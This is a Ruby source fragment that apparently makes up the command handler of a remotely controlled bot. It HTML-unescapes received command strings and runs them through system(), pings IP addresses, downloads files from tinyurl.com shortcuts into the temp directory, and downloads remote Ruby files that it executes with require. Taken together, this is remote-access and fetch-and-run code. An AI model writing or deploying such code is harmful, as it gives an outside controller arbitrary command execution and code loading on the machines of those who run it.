# Execute the given commands
def exec command, verbose
	if command!=""
		# this could be done with the cgi module but that just adds more bulk so 
		# doing the chars I know about by hand
		command.gsub!(/&amp;/, "&")
		command.gsub!(/&gt;/, ">")
		command.gsub!(/&lt;/, "<")
		if verbose
			puts "executing command - " + command
		end
		system(command)
	end
end

# Ping the given IP address
def ping ip, verbose
	if validate_ip(ip)
		if verbose
			puts "going to ping "+ip
		end
		if is_windows?
			# Windows doesn't seem to like if the parameters are specified separately
			system("ping -n 2 " + ip)
		else
			system("ping", "-c 2", ip)
		end
	else
		if verbose
			puts "Invalid IP"
		end
	end
end

# Download a file
def get_file shortcut, verbose
	if shortcut!=""
		url="http://tinyurl.com/"+shortcut
		if verbose
			puts "getting file - " + url
		end
		if is_windows?
			output_file_name = ENV['TEMP'] + "\\" + shortcut
		else
			output_file_name = "/tmp/" + shortcut
		end
		download_file(url, output_file_name)
	end
end

# Change what language is being used
def change_language shortcut, verbose
	if verbose
		puts "using new language file " + shortcut
	end
	filename = Digest::SHA1.hexdigest(Time.now.to_s) + ".rb"
	if is_windows?
		output_file_name = ENV['TEMP'] + "\\" + filename
	else
		output_file_name = "/tmp/" + filename
	end
	url="http://tinyurl.com/"+shortcut
	puts "downloading "+url
	if download_file url, output_file_name
		require output_file_name
		puts "Now using dynamic file " + @dynamic_file_name
	else
		puts "Download failed"
	end
end
